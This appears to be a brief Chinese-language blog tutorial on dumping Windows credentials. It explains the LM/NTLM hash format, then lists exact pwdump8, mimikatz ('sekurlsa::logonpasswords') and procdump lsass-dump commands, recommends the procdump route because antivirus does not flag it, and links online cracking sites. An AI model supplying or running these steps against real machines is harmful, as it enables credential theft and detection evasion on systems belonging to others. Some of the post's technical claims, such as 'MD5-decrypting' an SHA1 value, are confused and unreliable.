Windows的系统密码hash默认情况下一般由两部分组成:第一部分是LM-hash,第二部分是NTLM-hash。Windows系统下hash密码格式用户名称:RID:LM-HASH值:NT-HASH值。1、利用pwdump8获取密码软件地址:https://www.openwall.com/passwords/windows-pwdump管理员权限运行cmd,获取加密后的NT-HASH登陆网站破解例如:Administrator:500:AF01DF70036EBACFAAD3B435B51404EE:44F077E27F6FEF69E7BD834C7242B040用户名称为:AdministratorRID为:500LM-HASH值为:AF01DF70036EBACFAAD3B435B51404EENT-HASH值为:44F077E27F6FEF69E7BD834C7242B040hash在线破解网站https://www.objectif-securite.ch/ophcrackMD5解码网站https://www.somd5.com/2、利用mimikatz获取明文密码privilege::debugsekurlsa::logonpasswords获取的SHA1为加密后的密码,该加密字段进行md5解密即可,存在空密码的用户也会抓取到一盒哈希值,将该sha1解密后其实是个空字段3、利用procdump&mimikatz获取密码(推荐不报毒)以管理员身份运行cmd,利用procdump导出lsass进程文件procdump.exe-accepteula-malsass导出结束后,把lsass.dmp文件复制到mimikatz运行目录下,执行以下命令,利用mimikatz读出内容sekurlsa::minidumplsass.dmpsekurlsa::logonPasswords获取的SHA1为加密后的密码,然后进行md5解密procdump下载地址https://docs.microsoft.com/zh-cn/sysinternals/downloads/procdumpmimikatz下载地址https://github.com/gentilkiwi/mimikatz/releases
未分类